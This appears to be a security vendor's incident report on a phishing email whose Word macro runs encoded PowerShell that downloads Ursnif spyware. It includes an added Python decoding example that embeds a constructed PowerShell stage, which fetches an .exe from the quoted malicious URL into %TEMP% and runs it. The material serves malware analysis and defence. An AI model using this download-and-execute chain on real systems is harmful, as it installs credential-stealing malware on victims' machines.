Perception Point’s platform recently caught an advanced threat, delivered as a Microsoft Word file, that was directed at one of our customers. Our Incident Analysis report below walks through the attack step by step and the damage it could have caused.
Key observations regarding this attack:
- An attempt to evade antivirus engines using several layers of obfuscation (an obfuscated macro and a base64-encoded PowerShell stage).
- An attempt to download and run a second-stage executable.
- An attempt to steal personal data, such as browser-saved usernames and passwords.
One of our customers received an email that had been flagged “malicious” by Perception Point’s platform. This report includes a “what-if” analysis to examine the potential effect of the attack, in case the malicious file had not been blocked.
- In order to gain the recipient’s trust, the attacker sent the email from an address that looked like that of an executive with whom the recipient regularly does business. The domain name was identical except for the top-level domain: “domain.net” instead of “domain.com”. “domain.net” did not correspond to any known mail server.
- Perception Point’s platform:
- Our platform detected the malicious content and flagged the email as “malicious” because of its attachment, a .doc file.
- The MD5 of the file is: fdd7f9367f976ceb07279648f373a93b
- Perception Point’s team uploaded the file to VirusTotal, since it had not yet been reported there as malicious.
Perception Point’s engines identified the malicious activity by inspecting the document’s macro commands. Two anomalies stood out: the macro is obfuscated, and it is far longer than any legitimate document macro would need to be.
The command lines as extracted by Perception Point’s platform
Dynamic Analysis of the Attachment.
- Detonating the Word .doc file in an isolated environment shows that the macro launches an encoded PowerShell command.
- The PowerShell command is base64 encoded.
- Once the first layer is decoded, the resulting payload is as follows:
- For the purpose of this analysis, we removed the final command, “invoke-expression”, so that the next stage would be revealed without being executed, and then ran the command:
- The PowerShell script downloads an .exe file from hxxp://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn, saves it under a random file name in a temp folder, and then executes it.
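To make the decoding and defanging steps above repeatable, here is an added Python example; it is not part of the original report or of Perception Point’s tooling. The encoded command it works on is constructed to have the same shape as the one described (a base64/UTF-16LE outer layer, a decoded stage that ends in Invoke-Expression, and a script that downloads an .exe to %TEMP% under a random name and runs it). The download URL is the one quoted in the report; the script text, variable names and helper names are assumptions.

```python
import base64
import re

# ---- Constructed sample (not the original payload) -------------------------
# Shaped like the chain the report describes: macro -> base64 PowerShell ->
# decoded stage ending in Invoke-Expression -> script that downloads an .exe
# to %TEMP% under a random name and runs it. The download URL is the one the
# report quotes; everything else is made up so the decoder can run offline.
STAGE2 = (
    "$u='http://zzajqwnewq.com/GGKO/chibura.php?l=anz9.yarn';"
    "$p=Join-Path $env:TEMP ([IO.Path]::GetRandomFileName()+'.exe');"
    "(New-Object Net.WebClient).DownloadFile($u,$p);"
    "Start-Process $p"
)
STAGE1 = (
    "$c=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + base64.b64encode(STAGE2.encode("ascii")).decode("ascii")
    + "'));Invoke-Expression $c"
)
# What a macro hands to "powershell.exe -EncodedCommand": UTF-16LE, then base64.
ENCODED_COMMAND = base64.b64encode(STAGE1.encode("utf-16-le")).decode("ascii")

# ---- Decoder ----------------------------------------------------------------
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64 runs
IEX_RE = re.compile(r"\b(?:Invoke-Expression|iex)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def decode_layer(blob):
    """Base64-decode one layer. -EncodedCommand takes UTF-16LE, which for an
    ASCII script shows up as a NUL in every second byte; anything else is
    treated as UTF-8."""
    raw = base64.b64decode(blob)
    if raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def peel(encoded_command, max_layers=5):
    """Decode the -EncodedCommand blob, then keep decoding any long base64
    string embedded in each stage. Returns the stages outermost first."""
    stages = []
    blob = encoded_command
    for _ in range(max_layers):
        stage = decode_layer(blob)
        stages.append(stage)
        match = B64_RE.search(stage)
        if not match:
            break
        blob = match.group(0)
    return stages


def defang(script):
    """Swap Invoke-Expression/IEX for Write-Output so that, if the stage is
    run in an isolated VM, the next stage is printed instead of executed.
    Same idea as the report's removal of the final invoke-expression."""
    return IEX_RE.sub("Write-Output", script)


def defang_url(url):
    # hxxp and [.] keep the indicator from being clickable in a report.
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def extract_urls(stages):
    """Collect every URL across all decoded stages, defanged for reporting."""
    found = set()
    for stage in stages:
        found.update(URL_RE.findall(stage))
    return sorted(defang_url(u) for u in found)


if __name__ == "__main__":
    stages = peel(ENCODED_COMMAND)
    for i, stage in enumerate(stages, 1):
        print(f"--- stage {i} (defanged) ---")
        print(defang(stage))
    print("URLs:", extract_urls(stages))
```

Running the block prints both decoded stages with Invoke-Expression replaced, and the defanged download URL. The UTF-16LE check matters in practice: pasting an -EncodedCommand blob into a plain base64 decoder yields NUL-interleaved text that regexes and string searches silently miss.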
Executable File Analysis.
- The downloaded executable was identified as “Spyware” on VirusTotal (file hash: 5eb5a460b9a8ce8c00b54e53e14eec78):
- The file is classified as TrojanSpy:Win32/Ursnif, a generic malware family with capabilities such as keylogging*, data theft, and command-and-control (C&C) communication.
*) A “keylogger” (short for “keystroke logger”) is software that records the keys struck on a keyboard, typically covertly so that the user does not know their actions are being monitored. It is usually deployed with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.
- TrojanSpy:Win32/Ursnif has been tracked since November 20, 2010, but this specific sample was first submitted to VirusTotal on June 12, 2018:
- Persistence techniques:
- The executable copies itself to the Administrator/AppData/Roaming/Microsoft/Dfdtents folder. AppData is hidden by default in Windows Explorer, so the folder is invisible to the user unless hidden items are shown.
- Creates a registry key for persistence.
- The malware collects data, such as usernames and passwords from browsers, and saves it in a hidden folder.
- To test the malware, we simulated a login to a Gmail account. As the screenshot below shows, the malware captured the username and the matching password.
This attack could have been very damaging for our customer: it was well disguised, and highly effective once released. Learn more about how our hardware-assisted platform is able to catch such attacks here: